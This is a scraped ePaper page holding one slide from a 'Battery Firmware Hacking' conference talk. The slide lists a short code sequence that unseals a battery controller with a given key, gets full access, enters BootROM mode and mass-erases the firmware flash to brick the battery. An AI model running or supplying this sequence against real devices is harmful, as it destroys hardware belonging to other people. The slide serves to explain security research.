05.01.2014 Views

Battery Firmware Hacking - Hacker Halted

Battery Firmware Hacking - Hacker Halted

Battery Firmware Hacking - Hacker Halted

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

Bricking is easy<br />

Lots of ways to brick the battery, here’s one way<br />

unseal(0x36720414);<br />

get_full_access(0xffffffff);<br />

// Enter BootROM mode<br />

write_word(kManufacturerAccess, 0xf00);<br />

// erase all instruction flash<br />

write_word(kSmb_FlashMassErase, 0x83de);<br />

// flash execute, i.e. run firmware<br />

send_byte(kFlashExecute);<br />

Sunday, October 2, 11

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!